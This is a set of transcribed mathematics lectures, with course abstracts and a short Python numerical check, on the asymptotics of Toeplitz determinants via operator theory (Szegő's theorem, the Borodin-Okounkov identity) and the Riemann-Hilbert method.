But there's a formula for such a determinant. Comes from the Baker-Kamble-Hausdorff formula. So the determinant of such a product is the exponential of the trace of a, b minus b, a. I gave a similar talk once and then someone told me at the end it was trivial because the trace of a, b minus the trace of b, a must be zero. So there, so I was being really, you know, silly. But a, b minus b, a in this case is trace class. It isn't the fact that a, b is trace class. You have to take the difference. So there really isn't, this is really right. There really is an answer. And if you take, simply take that trace, you get this sum here. You get the exponential of k, from, of the sum from k equals one to infinity of k, of log, log of phi sub k, log of phi sub minus k. So this is, this is Zago's original answer. And just notice that this is never zero. And he was actually, the first case he did was for a real valued function. And in that case this is actually, the, the phi sub, the log phi minus k, that, that product is actually the absolute value of log sub phi of k. That sum is actually positive. Okay, so that's the answer. Okay, so we've got an answer. We've got our proof. And so what I want to do is talk about now adapting this proof. Or I just want to tell you how you can adapt this proof. So this, you know, if you, if you have a proof that is nice for one thing, but never works for anything else, maybe it's not so great. But this proof actually works in a whole bunch of settings. And the, the real essence is you just multiply on the right and left by something that makes the middle thing trace, i plus trace class. That's really, that's really the, the moral here, the lesson. And so it extends to lots of other things. And so let me kind of go through that list. So the, the same proof works almost word for word for matrix valued symbols. I haven't talked about matrix valued symbols at all here. But instead of constants running down diagonals, you can, you can, you can have a matrix valued symbol so that the things on the diagonals are actually matrices themselves. So you're actually getting periodic diagonals then. So the same, the same proof works except that you have to have a two sided factorization. I mean, you have to be careful about order. So it's a little bit different. And the other thing about the matrix case is that, that last computation I did where I wrote it in Zago's original form does not work because things don't commute the right way. This, I mean, the actual scalar functions don't commute. So it's, in the matrix case, it's hard to figure out the answer, the actual answer. I mean, if it determines an answer, but it's maybe not an answer that you know a lot about. And in the matrix case, the answer can actually be zero. And you don't even, can't even tell ahead of time sometimes. So the matrix case, there's a ton of work in some sense still to do. There is some stuff known, and we could talk another whole hour about the answer, just the answer itself in the matrix case. Now, this same proof also works to give you an identity for topolitz operators. You have to use one more sort of little fact, and it's something that's called a Jacobi identity for projections. It's an old, old thing about determinants that everybody's mostly forgotten. But if you use it for this, it works. And it says the following, and this helps answer the other question about other terms. This is not asymptotic, this is equals. 
So, given the conditions of our theorem, the Toeplitz determinant is equal to the geometric mean to the nth power, times our constant E(φ), which is the determinant of T(φ) T(φ^{-1}), times another infinite determinant. That infinite determinant is of I minus a product of Hankel operators, and z here is e^{iθ}. Each of these Hankel factors tends to zero in the Hilbert-Schmidt norm; well, that is not quite right: they are Hilbert-Schmidt operators times projections that tend to zero, and so the product tends to zero in the trace norm. So if you like, you can try to expand this and get other terms; that is one way to try to do it, and sometimes we have done that. It is also another way to prove Szegő's theorem: you just say that the trace norm of the product of Hankels tends to zero, so that determinant tends to one. So this is an identity. It was found independently by two different groups of people: Geronimo and Case did it a long time ago, in sort of an appendix of a paper, and no one knew about it; then Borodin and Okounkov did it, because of some random matrix theory problems. It was rediscovered, and it has now been redone in all kinds of settings.

Okay. You have one minute. One minute? I thought I had more. No? All right, that's fine. So the proof can also be adapted to the following case, and this is actually sort of new. Take your Toeplitz matrix, and take an analytic function f defined, say, on a disk whose radius is at least the infinity norm of the symbol. Then you can form f(T(φ)), truncate that operator, and even though you have no idea what its matrix representation looks like, you can ask about the asymptotics of its determinant. You can do the same proof, and here is the answer: it is the geometric mean of f(φ), to the nth power, times the determinant of f(T(φ)) T(f(φ))^{-1}. The very same proof works, it works in the matrix case, and sometimes you get interesting answers out of it. It can also be adapted to perturbations of a Toeplitz matrix: you can take Toeplitz plus Hankel, chop it off, take the upper left-hand corner and ask about those asymptotics, or even T(φ) + H(ψ), with a different symbol in the Hankel part. So it is very adaptable.

I am just about out of time, so I think next time I'll start with the integral operator case. I'm not going to redo the proof; I'll just show you why this also works for integral operators. In some sense they have exactly the same structure, just different projections and a different setting; the proof is completely analogous in the Wiener-Hopf setting, so we'll start with that next time.

Just a little word about history. Szegő proved what is now called the first Szegő theorem, the one without the constant term, in 1915, a long time ago. Then, in answer to a question about the Ising model posed by Onsager, he extended it to include the constant; I think that was around 1952, and he did it for positive functions that were smooth. Then this became more important in that setting and was extended by lots of people. Widom extended it to the matrix-valued case much later, around 1976, so with the matrix addition it is generally referred to as the Szegő-Widom theorem. Okay, I'll stop here and start up again with the rest next time.
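A minimal numerical illustration of the strong Szegő asymptotics, not part of the lecture's argument. The symbol chosen here is my own example: φ(e^{iθ}) = exp(a cos θ), whose Fourier coefficients are the modified Bessel values I_k(a); then (log φ)_0 = 0, so G(φ) = 1, and E(φ) = e^{a²/4}, so the finite determinants should approach E(φ).

```python
import numpy as np
from scipy.linalg import toeplitz
from scipy.special import iv

a = 1.0
# Fourier coefficients of phi(e^{i theta}) = exp(a cos theta) are phi_k = I_k(a),
# so the n x n Toeplitz matrix is symmetric with first column (I_0(a), ..., I_{n-1}(a)).
def D(n):
    return np.linalg.det(toeplitz(iv(np.arange(n), a)))

E = np.exp(a**2 / 4)      # strong Szego constant; G(phi) = exp((log phi)_0) = 1 here
for n in (2, 5, 10, 20):
    print(n, D(n), E)     # D(n) should approach E as n grows
```

Since this symbol is analytic in an annulus, one expects the printed determinants to settle near e^{1/4} ≈ 1.284 already for quite small n.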
OK, so we have, yes, questions? Yes, all right. Hi. Sorry, may I ask you about this Borodin-Okounkov and Geronimo-Case identity? Does it mean that E(φ), this constant, is equal to zero only if the determinant of T_n(φ) is equal to zero for some n? No, not at all. First of all, E(φ) is never zero in the scalar case; it can only vanish in the matrix-valued case. But the formula does tell you something that you might be asking about. In the scalar case E(φ) is never zero; in the matrix case it can be zero while the determinants of T_n(φ) are still nonzero. What that really means is that you are not going to have such a nice factorization in that case. The way to interpret it is that the determinant of T_n divided by G(φ) to the n just goes to zero, and then the result gives you no good information; you have to do something more. It is like the scalar case with a lot of winding, right. Is that what you were asking? Yes, exactly. But you can see something out of the formula. There are cases where you can actually figure out E(φ) in the matrix case: you see, the z^{-n} will kill your coefficients if there are only finitely many of them. If your coefficients only go out to, say, index 5, and you multiply by z^{-n}, those Hankels disappear, and then you can compute E(φ) from a finite determinant. That is a case where you can do it in the matrix case. But in general no general results exist, except for that.

Any further questions? I just have a quick question; sorry to ask the same thing again. In the end, does the theorem only require finiteness of the Sobolev norm? Is the Banach algebra structure an artifact of the proof, which can then be removed by density arguments and so on? Yes, that is right, but it is not an if and only if in general. For example, for a real-valued function, let's go back: if you have a function in L1 whose logarithm also exists in L1, you write down the Fourier coefficients of the logarithm, and if that Sobolev-type sum built from them is finite, then Szegő's theorem works. That is all you need; the condition is on the coefficients of the log. So for real-valued functions with the logarithm in L1 it is essentially an if and only if. And in the matrix case, is there also an if and only if? No. The matrix case is just much, much harder. In some ways it is the same proof, so you think it is kind of the same, but the matrix case is difficult, and you have these cases where E is zero and you get nothing out of it; E can be zero for very simple functions.

Is that ten minutes? Yeah. Could you tell us a good reference for some of the properties at the beginning of your lecture? A reference, yes; I actually have these at the end of my slides. You mean the properties of the trace class operators, or the Hankels, or all of it? Yes, let me show people.
So let me go to the very end of the slides, because I have some references there but I ran out of time; the rest is coming tomorrow. These are the original papers of Szegő: the 1915 one, and the one that actually produces the constant, the answer to Onsager's question, from 1952. Then there was a huge amount of activity in this field, with lots of people I have not yet mentioned and was going to mention at the end. Albrecht Böttcher and Bernd Silbermann did a lot of work in this area, especially for singular symbols, which we are going to talk about later, and they have two books which in some sense contain everything you ever wanted to know about Toeplitz operators. One is called Introduction to Large Truncated Toeplitz Matrices, and it is accessible to the non-expert: you can actually open it up and figure out what a theorem says. The other, Analysis of Toeplitz Operators, is the classic in the field, and it has everything about trace class operators, Hilbert-Schmidt operators, all the Banach algebras, all the different spaces; it contains all the proofs that I did. Widom's proof, from 1976, was the first proof that used operator theory for this problem; before that the proofs were identities and hard analysis, nice proofs, but that was the beginning, and it is the first place where this infinite determinant was used. The Borodin-Okounkov identity was first proved with different methods, and then Harold and I gave a proof that used the same operator theory techniques, back in 2002. The Böttcher and Silbermann books are great references, especially the one on large truncated matrices, which also has a lot about the spectrum. I did not talk at all about the spectra of the finite matrices, the eigenvalues; that is another whole subject, and a case where you often want to change the underlying space: you don't want H2, you want something else. But we could talk a lot longer. Okay. And I will just make the remark that Szegő's first paper here was written when he was about 20 years old and in the trenches of the First World War, in the Austro-Hungarian Imperial Army. And we thank our speaker again.
These lectures will focus on understanding properties of classical operators and their connections to other important areas of mathematics. Perhaps the simplest example is the asymptotics of determinants of finite Toeplitz matrices, which have constants along the diagonals. The determinants of these n by n matrices have (in appropriate cases) an asymptotic expression of the form G^n × E, where both G and E are constants. This expansion is useful in describing many statistical quantities for certain random matrix models. In other instances, where the above expression must be modified, the asymptotics correspond to critical temperature cases in the Ising model, or to cases where the random variables are in some sense singular. Generalizations of the above result to other settings, for example convolution operators on the line, are also important. For Wiener-Hopf operators, the analogue of the determinants of finite matrices is a Fredholm determinant. These determinants are especially prominent in random matrix theory, where they describe many quantities including the distribution of the largest eigenvalue in the classic Gaussian Unitary Ensemble, and in turn connect to the Painlevé equations. The lectures will use operator theory methods to first describe the simplest cases of the asymptotics of determinants for the convolution (both discrete and continuous) operators, then proceed to the more singular cases. Operator theory techniques will also be used to illustrate the links to the Painlevé equations.
10.5446/54155 (DOI)
So, it is great to be here, of course. And I am not from Purdue; I am from Indiana University-Purdue University Indianapolis, which is a different, although related, institution. So let me write it down again. We have a symbol on the unit circle, oriented positively, and I am going to talk just about truncated Toeplitz matrices, with entries φ_{j-k}, and we are interested, of course, in the large-n asymptotics of their determinants. I will present an alternative point of view. Estelle is giving us the operator techniques, the general operator theory approach; I will present a sort of classical analysis approach, so these are complementary things. The approach I am going to present is more recent, although it is based on much older mathematics; basically I will not leave nineteenth-century mathematics, except at one point where I will use twentieth-century mathematics. It came first as an application to Toeplitz determinants of the techniques developed in the modern theory of integrable systems. At first we simply followed the great people before us who used the operator approach: we developed the technique by reproving what they had already proved, and I am going to present some of that now. But then it turned out that the technique is in some sense more efficient, especially in situations related to special functions and to Painlevé functions. That is not for today; maybe tomorrow I will come to the situations where the Riemann-Hilbert technique seems really very convenient.

So first let me present the classical facts: not operator analysis facts, but classical facts about Toeplitz determinants. First of all, a Toeplitz determinant can be written as a multiple integral, and this is what physicists especially like very much nowadays. By the way, these two formulas, the determinant and the multiple integral, show the difficulty: I want to analyze the large-n limit, so either I have to work with determinants whose size goes to infinity, or with multiple integrals where the number of integrations goes to infinity. That is the crux of the issue from the classical analysis point of view, and the operator technique is exactly one way to handle it. It is an interesting point; I was once told by Misha Semenov-Tian-Shansky that, in a sense, the difference between classical analysis and modern analysis is this: in classical analysis you study asymptotics of integrals where the number of integrations is fixed, while in modern analysis you study integrals where the number of integrations goes to infinity. Because modern analysis deals with quantum mechanics, and what is quantum mechanics? It is exactly the situation where the number of integrations goes to infinity; it is Feynman integrals. And operator methods came to provide the correct environment for that. However, there is another way to handle it.
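In formulas, the two representations just described are the following, with φ_k the Fourier coefficients of the symbol; the second is the classical Heine-type multiple-integral form:

\[
D_n(\varphi)=\det\big(\varphi_{j-k}\big)_{j,k=0}^{n-1},\qquad
\varphi_k=\int_{0}^{2\pi}\varphi(e^{i\theta})\,e^{-ik\theta}\,\frac{d\theta}{2\pi},
\]
\[
D_n(\varphi)=\frac{1}{n!}\int_{0}^{2\pi}\!\!\cdots\!\int_{0}^{2\pi}
\prod_{1\le j<k\le n}\big|e^{i\theta_j}-e^{i\theta_k}\big|^{2}\,
\prod_{j=1}^{n}\varphi(e^{i\theta_j})\,\frac{d\theta_j}{2\pi}.
\]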
And it comes, again, from classical analysis: this is the Riemann-Hilbert problem. I will show how it takes care of this large-n situation. But first, and it is very important for the Riemann-Hilbert approach, I need the connection of Toeplitz determinants with orthogonal polynomials on the circle. This is the main thing. First of all, there is the following formula, which expresses the Toeplitz determinant as the product of the numbers h_0 h_1 ... h_{n-1}; these numbers come from the theory of orthogonal polynomials on the unit circle, for which Barry Simon introduced the terminology. What is it? Given the symbol φ, I can define not only the Toeplitz determinant but also a collection of monic orthogonal polynomials p_n, determined by the conditions that the integral of p_n(z) z^{-k} against the weight, for k from 0 to n, equals h_n δ_{kn}. This is a linear system for the coefficients of these polynomials, and when I go up to degree n-1 the matrix of this linear system is exactly the Toeplitz matrix. So this is the fundamental relation, and h_n is then determined uniquely. There are a couple more important formulas which I am going to use, and to produce them I need to introduce something else: a kind of companion family to my original polynomials. I again introduce monic polynomials, call them p̂_n, and again the Toeplitz matrix is the matrix of the linear system for their coefficients; the p̂_n satisfy the analogous relation, with z^{-k} replaced by z^{k}, for k from 0 to n, and afterwards one can check that the same h_n appears. There is then a kind of biorthogonality between the two families, now valid for all n and k. Why the terminology orthogonal polynomials? Because in the classical situation, when φ is real, p̂_n essentially coincides with p_n itself; in the general case, p̂_n is the same construction applied to the symbol with z replaced by 1/z. It is easy to check this relation.

So I have just described these objects. What is important is that the logarithm of the Toeplitz determinant can be written as the following double integral: the integral over γ from 0 to 1 and over the circle of [p_n'(z; γ) q_{n-1}(z; γ) - p_n(z; γ) q_{n-1}'(z; γ)] times z^{-n} (φ(z) - 1), over 2πi, dz dγ. Here p_n(z; γ) means the polynomial constructed with respect to φ_γ, where φ_γ = γφ + (1 - γ). So if I introduce this parameter γ into the weight, I can reconstruct the logarithm of the determinant according to this formula. I am not going to prove it; it is a very classical thing that can be found in the textbooks. (Bigger? Okay, bigger, even bigger; at least let me rewrite the formula bigger.) So once more: the bracket is multiplied by z^{-n} (φ(z) - 1) over 2πi, and we integrate in z and in γ.
So again, φ_γ is γφ + (1 - γ): I just take the straight line in the space of symbols from the constant function 1 to my symbol φ. And q_n(z) is -(1/h_n) z^n p̂_n(z^{-1}). So the meaning of the formula is this: I have two collections of polynomials, the orthogonal polynomials p_n and the companion polynomials p̂_n; I let them depend on the parameter γ through the weight, and this gives the formula for the determinant. Of course, I should say that I am assuming all the conditions needed for the orthogonal polynomials to exist, which means the relevant determinants are not zero. When φ is positive this is automatic; if it is not, there might be issues, and in each concrete case you have to check that everything can be arranged. But I will assume everything is okay.

Very well. So that is the classical theory. According to it, I could in principle compute the asymptotics of the Toeplitz determinant if I could handle the asymptotics of the orthogonal polynomials. But that is again a problem, a kind of tautology, because for the orthogonal polynomials you would in principle need the asymptotics of the Toeplitz matrices. And here is the way out: a Riemann-Hilbert representation of orthogonal polynomials on the unit circle, introduced by Baik, Deift, and Johansson. Let us define Y(z) in the following way: in the first column I put p_n(z) and q_{n-1}(z), and in the second column I put the Cauchy transforms of the first column against the weight, that is, (1/2πi) times the integral over C of p_n(s) s^{-n} φ(s)/(s - z) ds, and the same with q_{n-1}. So let us define such a matrix-valued function. Then it has the following properties. First, it is analytic everywhere off the unit circle, which is of course trivial. Second, under reasonable conditions on φ it has boundary values from the two sides of the circle, plus and minus, related by a jump matrix involving z^{-n} φ(z); this again is trivial, you need nothing about p and q, it is just the Plemelj-Sokhotski formula applied to the second column. And finally, it has a specific asymptotic behavior as z goes to infinity, and this is where the orthogonality is essential. For the first two properties I could have used any two polynomials; this one needs orthogonality. Let me check it. In other words, what does the condition say? It says that Y(z) behaves like z^n, up to lower order, in the first column, and like z^{-n}, with a correction of order z^{-n-1}, in the second column. So in the second column I have a very deep zero at infinity, and of course such a deep zero is possible only if p_n is orthogonal to the proper sequence of moments.
So let's just, let's just check this. Let's just look at this. So my integral is, of course, I can rewrite it, 2 pi i. I can rewrite it as, I can expand. If z is far from unit circle, I can just expand this, this denominator in the geometric progression. And what I would get, I would get this. And of minus c k plus 1 k from zero to infinity, and here I would have c p l s s to the power k minus n phi of s ds 2 pi i. And it is easy to see that you remember the condition of orthogonality was p and z, z minus k phi of z d z 2 pi i z equals zero. So that was the condition of orthogonality. So k zero, it is zero. And so up to the k equals, what? I can, I have to, plus one z. Up to the k equals n. It's always going to be, to be zero. So indeed I would have this. I would have this. And similar, similar analysis can be done with this integral. And this normalization is correct because you remember q n minus one, it is one over h n exactly. And so this was, this was this. So this is three, three, three properties of this, of this matrix function. And the crucial observation is, the crucial observation is that these three properties determine this y uniquely. These three properties determine this y uniquely. Let's just prove it. First I notice that automatically determinant of y is one. So if I take determinant, then determinant would of course, a priori satisfy this condition, but it would have no jump because the determinant of this matrix is one. And also at infinity it would go to one because this determinant is also one. So we would have that, we have a function which is analytic everywhere on complex plane and goes to, to, to unit at infinity. So it is identically one. So that is this. And second, if I have another function, if I assume that there is another function not necessarily constructed by this formula, but which satisfies this condition, which satisfies this conditions. And if I consider the ratio, I can, I can, it is because of that it is an innocent operation to take y minus one. I will get a function. This is already matrix function, which is what, which is again a priori analytic outside of C. But when it goes to C, they would gain exactly the same jump, and it is the right, right order of matrix multiplication jumps is cancelled. So again, it is has no jump. And then at infinity, what is going on at infinity again, this is the right order, because those two factors, they would meet, they would meet each other here and cancel. And so again, it in things, it was also identity matrix. So then it is identically one. So it means that we can. So the whole idea now to, to think, think it is kind of forget about this formula. Forget about this formula. So now, if I want to talk about, about Togon of polynomials, I can just go straight to this Riemann-Hirbert problem. And if I solve it, if I can analyze this asymptotic, so solve it is a bad word in the, because I can solve it. This is the explicit formula for this solution. But the point is forget about it. Again, for large an asymptotic, this formula is useless. Again, it is tautology. Again, I have to know PN. But for this, because it is now can be taken as a definition of why it is okay because now as n goes to infinity, there is no changing called the structure. It is just, it is only here. So we have to handle it is in a sense as, as I say, if you have contour integral and large parameter is involved in some exponential, in some exponential kernel, then you just do asymptotic analysis. 
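Spelled out, with the circle oriented counterclockwise and the plus boundary value taken from inside, the Riemann-Hilbert problem just described, together with the recovery of the quantities of interest (the formula for h_n follows from the orthogonality relation used above), is:

\[
Y(z)\ \text{analytic in }\mathbb{C}\setminus C,\qquad
Y_+(z)=Y_-(z)\begin{pmatrix}1 & z^{-n}\varphi(z)\\[2pt] 0 & 1\end{pmatrix},\ \ z\in C,\qquad
Y(z)\,z^{-n\sigma_3}=I+O(z^{-1}),\ \ z\to\infty,
\]
\[
\sigma_3=\begin{pmatrix}1&0\\0&-1\end{pmatrix},\qquad
p_n(z)=Y_{11}(z),\qquad h_n=Y_{12}(0).
\]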
But of course it is much more complicated than that. Still, if you do it, the orthogonal polynomials can be reconstructed through this formula, and h_n as well: h_n is the 12 entry of Y at zero, so if I put z = 0 I get exactly h_n. So if I have this, I can reconstruct that. Now, how much time do I have? Okay. Let me now reproduce, using this technique, the strong Szegő theorem; how can we get it from this reformulation? First of all, I want to rewrite the formula for the determinant in terms of the solution of my Riemann-Hilbert problem: the bracket in the integrand becomes Y_11'(z) Y_21(z) - Y_11(z) Y_21'(z). So now I have this expression for my determinant, and let us try to find the asymptotic solution of the problem. And I assume a lot; this is the real advantage of Riemann-Hilbert analysis in applications to concrete problems, when you have a concrete φ: then you can do things very quickly. It would be more difficult for me to reproduce the results Estelle told us about, the best results from the point of view of the functional classes of φ. But to get the strong Szegő theorem quickly, I will simply assume that φ is analytic in some annulus containing the unit circle and that it has no winding, so it can be written as φ = e^V, where V is analytic in the annulus, that is, V is a convergent Laurent series.

Okay, so now let us proceed. I am going to make several exact transformations of my original problem and eventually arrive at a Riemann-Hilbert problem with a small jump. As it stands, everything oscillates: if it were not for the factor z^{-n}, I would just solve my problem by a contour integral, and the whole nonlinear steepest descent would be the usual steepest descent. The problem is how to get rid of this factor. In fact, a similar problem had appeared before, for Hankel determinants, where this idea was used; for Hankel determinants getting rid of the oscillation is a real issue, but for Toeplitz it is easy. My first transformation is very naive, and it works: I define T(z) to be Y(z) multiplied by z^{-n σ_3} for |z| greater than one, and just Y(z) for |z| less than one; σ_3 is the diagonal matrix with entries 1 and -1. So I simply kill the factor by hand. What do we get for T? The jump for T becomes the matrix with z^n and z^{-n} on the diagonal and φ(z) in the upper corner.
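In formulas, with the same orientation conventions as before, the transformation just made and the problem it produces are:

\[
T(z)=\begin{cases} Y(z)\,z^{-n\sigma_3}, & |z|>1,\\[3pt] Y(z), & |z|<1,\end{cases}
\qquad
T_+(z)=T_-(z)\begin{pmatrix} z^{\,n} & \varphi(z)\\[2pt] 0 & z^{-n}\end{pmatrix},\ \ z\in C,
\qquad T(z)\to I,\ \ z\to\infty.
\]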
So of course I have just moved this factor into the jump matrix, and at infinity I now have the good normalization that one always has in the standard setting of a Riemann-Hilbert problem. But the jump matrix is oscillatory, and we now have to handle that: we want to transform it into a jump matrix which is close to the identity as n goes to infinity. And here is the only reference to twentieth-century mathematics: if I have a Riemann-Hilbert problem whose jump matrix is close to the identity, then the solution is close to the identity. To make "close to the identity" precise I need two norms, and I need the important fact that the Cauchy operator is bounded as an operator in L2 for the relevant contours. This is basically the only functional-analytic input one needs in applications to most practical problems: random matrices, Painlevé equations, statistical mechanics. You need more if you apply the Riemann-Hilbert technique to PDE, where you really have to go to more general settings of the Cauchy problem.

Okay, so we have this. What is next? Here is the crucial, simple observation. (Is there a long piece of chalk? Ah, there is one; thank you. We do have chalk in France.) There is this formula: the jump matrix can be factorized like that. I always forget the name; it is an LU-type factorization, and you could of course do it with upper triangular factors instead. And now look, this is where I am going to use my assumption on φ. This first factor can be extended a little, to a slightly bigger contour, where it becomes very close to the identity; that other factor can be extended to a slightly smaller circle, where it also becomes close to the identity. More exactly: this is my original unit circle C, and I consider two more contours, γ_1 outside and γ_2 inside, both lying in the annulus where φ is analytic; they cut the plane into domains 1, 2, 3, 4. And I pass from T to S, where S is T multiplied by the triangular factor with z^{-n} φ^{-1} in domain 2, by the triangular factor with z^{n} φ^{-1}, with the appropriate sign, in domain 3, and S equals T in domains 1 and 4. (Is it φ or φ_γ here? Right now it is φ_γ, yes; I just write it without the γ.)
Yes: for every γ from zero to one my φ_γ is analytic in the annulus, so I simply skip writing the γ, because at the moment everything is the same for any γ. So the Riemann-Hilbert problem for S is now set on three contours, C, γ_1 and γ_2, and the jump matrices are just what is left: on the outer contour the lower-triangular matrix with z^{-n} φ^{-1} off the diagonal, on the internal contour the one with z^{n} φ^{-1}, and on the circle itself the off-diagonal matrix with φ and -φ^{-1}. At infinity, S is the identity. Common sense tells us that asymptotically it looks completely reasonable to forget about the two extra contours, where the jump matrices are exponentially close to the identity. So one expects that S is close to the function which satisfies the problem with the jump only on the unit circle, with this off-diagonal jump matrix, and which is the identity at infinity. And this model problem can be solved explicitly in the scalar case. Everything up to here could actually be done for matrix symbols as well; this is the moment where the matrix case becomes much more complicated. In the scalar case we solve it at once: first we introduce the so-called Szegő function, which solves the corresponding scalar problem, and then the solution S-infinity is given as the Szegő function raised to the power σ_3, times the identity outside the circle and times the constant off-diagonal matrix inside. This is an explicit solution. And if we trace back all our transformations, it means that the first column of Y is given by an explicit asymptotic leading term; for instance, on the circle it can be written in terms of the boundary value d_+ raised to the power σ_3. So that is an explicit leading term for the asymptotics of the first column of Y, which is what I need for my orthogonal polynomials. Okay, I will wrap it up this afternoon. Any questions?

Could one do the same for Hankel determinants, where you have orthogonal polynomials on the real line; where does it get more complicated? It is already at the very first step; half the audience knows all this maybe better than I do, but let me elaborate a little on the question. It is exactly this first step that is ruined if I consider the analogous Riemann-Hilbert problem set not on the circle but on the real line, or on an interval of the real line. There, this naive transformation would just bring the singularity from infinity to zero and leave the jump matrices badly oscillatory. And of course the senior members of the audience know very well what to do in the Hankel case: instead of this transformation you have to introduce a very important ingredient, the equilibrium measure. That is how you handle this step there. So, maybe I got confused.
Did you introduce the notation D to the power σ_3, and what is this D? I introduced σ_3. Sasha, D to the σ_3 is... Yes, σ_3 is up there, but D to the σ_3 is not. Fair enough. Any further questions? Well, if not, I think we thank you.
Starting with Onsager's celebrated solution of the two-dimensional Ising model in the 1940's, Toeplitz determinants have been one of the principal analytic tools in modern mathematical physics; specifically, in the theory of exactly solvable statistical mechanics and quantum field models. Simultaneously, the theory of Toeplitz determinants is a very beautiful area of analysis representing an unusual combination of profound general operator concepts with highly nontrivial concrete formulae. The area has been thriving since the classical works of Szegő, Fisher and Hartwig, and Widom, and it very much continues to do so. In the 1990s, it was realized that the theory of Toeplitz and Hankel determinants can also be embedded in the Riemann-Hilbert formalism of integrable systems. The new Riemann-Hilbert techniques proved very efficient in solving some of the long-standing problems in the area. Among them are the Basor-Tracy conjecture concerning the asymptotics of Toeplitz determinants with the most general Fisher-Hartwig type symbols, and the double scaling asymptotics describing the transition behavior of Toeplitz determinants whose symbols change from smooth Szegő type to singular Fisher-Hartwig type. An important feature of these transition asymptotics is that they are described in terms of the classical Painlevé transcendents. The latter are playing an increasingly important role in modern mathematics; indeed, the Painlevé functions are now often called the "special functions of the 21st century". In this mini course, the essence of the Riemann-Hilbert method in the theory of Toeplitz determinants will be presented. The focus will be on the use of the method to obtain the Painlevé-type description of the transition asymptotics of Toeplitz determinants. The Riemann-Hilbert view on the Painlevé functions will also be explained.
10.5446/54156 (DOI)
And yes, this is the asymptotic formula; strictly speaking it is of course not an equality, but something like it, with the error controlled by ρ^{-n} for some number ρ greater than one, which depends on the size of the annulus where my symbol is assumed to be analytic. It holds for z on the unit circle, and it gives the first column of Y, which is what I need. And d is the Szegő function, the exponential of (1/2πi) times the integral over C of log φ(s)/(s - z) ds. What is also important: this φ is of course φ_γ; all the Y's and d's, everything, is built from φ_γ, the deformation of my original symbol.

So what do we have then? Everything is at hand now, and it is just a matter of reasonably skillful elementary analysis; let me jump over the absolutely routine steps and just outline it. From the asymptotic formula, Y_11 is d_+ times φ_γ^{-1} times z^n, and Y_21 is just minus d_+^{-1}. There is no difficulty in differentiating these expressions with respect to z, so let me just write the result for the bracket Y_11' Y_21 - Y_11 Y_21': you get three terms, minus twice d_+' d_+^{-1} φ_γ^{-1} z^n, plus φ_γ^{-2} φ_γ' z^n, and minus n φ_γ^{-1} times the corresponding power of z; the prime means the derivative with respect to z, and the three terms are just the contributions of differentiating the three factors, grouped in the natural way.

This means that my determinant can be written, again not exactly but up to exponentially small corrections, as I_1 + I_2 + I_3. Here I_1 is twice the integral over γ from 0 to 1 and over C of d_+' d_+^{-1} φ_γ^{-1} (φ - 1) dz/(2πi) dγ: you see, I have to multiply by z^{-n} and by the difference φ - 1, and the z^{-n} cancels. I_2 is minus the double integral of φ_γ^{-2} φ_γ' (φ - 1) dz/(2πi) dγ, and I_3 is n times the double integral of φ_γ^{-1} (φ - 1) dz/(2πi z) dγ. These are the three terms.

Now let us start with the last one. Notice that φ - 1 is nothing but the derivative of φ_γ with respect to γ. So I_3 is just n times the double integral of the γ-derivative of log φ_γ, dz/(2πi z) dγ: this combination is the logarithmic derivative of φ_γ in γ, so I can integrate in γ, the lower limit contributes nothing, and I get n times the integral over C of log φ, now without any γ, dz/(2πi z). And this is the Szegő theorem, not the strong one but the leading, exponential term: n times the average of log φ, its zeroth Fourier coefficient. So that is the first term. Now, as a piece of homework for those who want to do it, you can prove that I_2 is zero; it is just a matter of playing with exact identities.
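Collected in one place, and with the exponentially small corrections and sign conventions suppressed, the objects entering this computation are (everything is built from the deformed symbol φ_γ = γφ + 1 - γ, and the differential identity is the one quoted from the previous lecture):

\[
d(z)=\exp\!\Big(\frac{1}{2\pi i}\int_{C}\frac{\log\varphi_\gamma(s)}{s-z}\,ds\Big),\qquad
\log D_n(\varphi)=\int_0^1\!\!\int_C\big(Y_{11}'Y_{21}-Y_{11}Y_{21}'\big)(z;\gamma)\,
z^{-n}\big(\varphi(z)-1\big)\,\frac{dz}{2\pi i}\,d\gamma,
\]
\[
Y_{11}(z;\gamma)\approx d_+(z)\,\varphi_\gamma(z)^{-1}z^{\,n},\qquad
Y_{21}(z;\gamma)\approx -\,d_+(z)^{-1},\qquad z\in C,
\]
\[
I_3=n\int_0^1\!\!\int_C \partial_\gamma\log\varphi_\gamma(z)\,\frac{dz}{2\pi i\,z}\,d\gamma
   =n\,(\log\varphi)_0 .
\]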
So what we will get: this time I am not going to represent the integrand as a derivative with respect to γ, but instead open up the formula for φ_γ and perform the integration with respect to z. For each fixed γ the z-integral is already zero: the integrand is explicitly integrable in z, and it gives two terms, the variation of log φ_γ around the circle, which is zero because we assume the index is zero, and the integral of the derivative of 1/φ_γ around the circle, which is also zero. So it is a very easy exercise: the z-integration alone kills I_2, under the assumption that for each γ the logarithm of φ_γ has no index. Let me record that I_2 = 0 and I_3 = n (log φ)_0. Now I_1. First, let me prepare to differentiate d_+ with respect to z. What is d_+? It is the exponential of the integral over C of log φ_γ(s)/(s - z) ds/(2πi), taken as the boundary value from inside. This is a singular integral; but because I have made my life very easy by assuming that φ_γ is analytic in an annulus, I can rewrite it as the exponential of (1/2πi) times the integral over C_plus of log φ_γ(s)/(s - z) ds, where now there is no boundary value to take: C_plus is a circle of slightly bigger radius than C, so before taking the limit of z tilde going to z on C from inside, I have made room for that limit. This is, of course, a great advantage of assuming φ analytic: there is no singularity in the formula, and I can differentiate with respect to z. So d_+' d_+^{-1}, the logarithmic derivative of this exponential in z, is just (1/2πi) times the integral over C_plus of log φ_γ(s)/(s - z)^2 ds. This means that my first integral is 2 times the integral over γ from 0 to 1, over C and over C_plus, of log φ_γ(s)/(s - z)^2, with s living on C_plus, times the γ-derivative of log φ_γ(z), which is what the factor φ_γ^{-1} (φ - 1) is, times ds dz/(2πi)^2 dγ. (No, no, let us move the board to the top; we are almost done. Ladies and gentlemen, this really is the end of the proof.)

So this is our formula, so far, for I_1. Now look: it is symmetric with respect to s and z. So I argue that it equals the integral from 0 to 1, over C and C_plus, of the γ-derivative of the product log φ_γ(z) log φ_γ(s), divided by (s - z)^2, ds dz/(2πi)^2 dγ. There is a little cheating here: it is symmetric, but I first have to interchange C and C_plus.
